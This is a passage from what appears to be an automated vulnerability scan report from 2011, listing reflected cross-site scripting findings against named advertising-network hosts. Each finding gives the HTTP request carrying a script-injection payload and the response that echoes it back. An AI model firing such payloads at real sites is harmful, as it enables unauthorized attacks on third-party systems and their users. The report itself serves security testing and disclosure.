User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4a24e";alert(1)//78bd77ef7b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=4a24e";alert(1)//78bd77ef7b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15067<script>alert(1)</script>559c6769366 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp129764733685915067<script>alert(1)</script>559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:07 GMT
Server: lighttpd/1.4.19
Content-Length: 66

jsonp129764733685915067<script>alert(1)</script>559c6769366(null);

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload bdd5a<script>alert(1)</script>01f935525e0 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp1297647336859&type=initbdd5a<script>alert(1)</script>01f935525e0&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:08 GMT
Server: lighttpd/1.4.19
Content-Length: 75

Error: type "initbdd5a<script>alert(1)</script>01f935525e0" not recognized.

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a742"><script>alert(1)</script>37cfb750f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/1783083111/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26f"><script>alert(1)</script>86e816e9a4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/114049446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e1a"><script>alert(1)</script>f19825639fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11355486136@x2349e1a"><script>alert(1)</script>f19825639fa?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1477922344/x2349e1a"><script>alert(1)</script>f19825639fa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a745b"><script>alert(1)</script>050408e5f6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/1959021525/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e244"><script>alert(1)</script>5324050ac37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/1110964581/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1f2c"><script>alert(1)</script>d093f0af15f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11473307965@x23f1f2c"><script>alert(1)</script>d093f0af15f?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1112750384/x23f1f2c"><script>alert(1)</script>d093f0af15f/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571f4"><script>alert(1)</script>cd3219b027d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/117581210/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4e6"><script>alert(1)</script>518d6ce49b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/1996747534/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d6c"><script>alert(1)</script>77e70440218 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11781759243@x2336d6c"><script>alert(1)</script>77e70440218?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:08 GMT
Server: Apache/2.0.52 (Red Hat)
